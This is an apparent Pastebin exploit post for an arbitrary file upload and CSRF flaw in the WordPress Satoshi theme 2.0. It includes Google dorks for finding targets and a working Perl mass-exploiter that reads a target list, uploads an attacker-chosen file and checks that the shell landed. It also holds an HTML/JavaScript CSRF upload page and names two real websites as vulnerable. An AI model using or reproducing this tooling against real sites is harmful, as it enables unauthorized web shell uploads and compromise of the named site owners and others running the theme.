Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress 4.7.13 Satoshi Themes 2.0 CSRF Unauthorized Insert File
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 05/06/2019
- # Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com
- # WordPress Affected Versions : 4.7.13 - 3.4.2
- # Theme Affected Version : 2.0
- # Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx
- themesinfo.com/?search_type=folder&search=satoshi
- # Theme used on : 106 websites
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Design By Voosh Themes
- inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica -
- # Vulnerability Type :
- CWE-352 [ Cross-Site Request Forgery (CSRF) ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description About Software :
- *****************************
- Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.
- ####################################################################
- # Impact :
- ***********
- WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers
- upload arbitrary files because it fails to adequately sanitize user-supplied input.
- An attacker can exploit this vulnerability to upload arbitrary code and execute
- it in the context of the webserver process. This may facilitate unauthorized access
- or privilege escalation; other attacks are also possible. This WordPress Theme is
- vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application
- does not, or can not, sufficiently verify whether a well-formed, valid, consistent request
- was intentionally provided by the user who submitted the request.
- ####################################################################
- # Vulnerability :
- ***************
- /wp-content/themes/satoshi/upload-file.php
- Vulnerability Message :
- *********************
- error
- Directory File Path :
- ******************
- /wp-content/themes/satoshi/images/[YOURFILENAME].html
- # Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :
- ********************************************************
- #!/usr/bin/perl
- use LWP::UserAgent;
- # Coded By KingSkrupellos
- # Cyberizm Digital Security Army
- # Perl Exploiter By CyBeRiZM :)
- my $qqvul ="/upload-file.php";#theme path vul
- my $datestring = localtime();
- ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
- sub randomagent {
- my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
- 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
- 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
- );
- my $random = $array[rand @array];
- return($random);
- }
- flag();
- print "[+] Enter List Of Target : ";
- chomp (my $list=<>);
- print "[+] Enter Evil File : ";
- chomp (my $file=<>);
- print "[+] Started : $datestring\n";
- open(my $arq,'<'.$list) || die($!);
- my @site = <$arq>;
- @site = grep { !/^$/ } @site;
- close($arq);
- print "[".($#site+1)."] URL to test upload\n\n";
- my $i;
- foreach my $web(@site){$i++;
- chomp($web);
- if($web !~ /^(http|https):\/\//){
- $web = 'http://'.$web;
- }
- print "[$i] $web \n";
- expqq($web);#exploiting website :)
- }
- sub expqq{
- my $useragent = randomagent();#Get a Random User Agent
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
- $ua->timeout(10);
- $ua->agent($useragent);
- print "[Testing] Exploit Existence \n";
- my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;
- my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;
- my $response = $ua->get($url);
- if ($response->is_success || $response->content=~/error/){
- print "[OK] Exploit Exists\n";
- print "[*] Sent payload\n";
- my $regex = 'success';
- my $body = $ua->post( $url,
- Content_Type => 'form-data',
- Content => [ 'uploadfile' => ["$file"] ]
- );
- if ($body->is_success ||$body->content=~ /$regex/){
- print "[+] Payload successfully executed\n";
- print "[*] Checking if shell was uploaded\n\n";
- my $res = $ua->get($ss);
- if ($res->is_success){
- print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";
- }
- else {
- print "[Faild] check file\n";
- }
- }
- else {print "[-] Payload failed : Not vulnerable\n";
- }
- }
- else {
- print "[No] Exploit Not Found\n";
- }
- }
- sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";
- }
- ####################################################################
- Cross Site Request Forgery CSRF Exploiter :
- *****************************************
- <!DOCTYPE html>
- <html>
- <head>
- <meta http-equiv="content-type" content="text/html; charset=UTF-8">
- <title></title>
- <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
- <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>
- <script type='text/javascript'>//<![CDATA[
- window.onload=function(){
- $(function(){
- var btnUpload=$('#upload');
- var status=$('#logo-upload-status');
- new AjaxUpload(btnUpload, {
- action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
- name: 'uploadfile',
- onSubmit: function(file, ext){
- /*
- if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){
- // extension is not allowed
- status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');
- return false;
- }*/
- status.text('Uploading...');
- },
- onComplete: function(file, response){
- //On completion clear the status
- status.text('');
- //Add uploaded file to list
- if(response==="success"){
- $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
- $('#satoshi_logo_image').val(file);
- } else{
- $('<li></li>').appendTo('#files').text(file).addClass('error');
- }
- }
- });
- });
- }//]]>
- </script>
- </head>
- <body>
- <span id="logo-upload-status"></span>
- <input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
- <input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
- </body>
- </html>
- ####################################################################
- # Example Vulnerable Sites :
- ************************
- [+] wordsmyth.se/wp-content/themes/satoshi/upload-file.php
- [+] fondaliscenografici.com/wp-content/themes/satoshi/upload-file.php
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement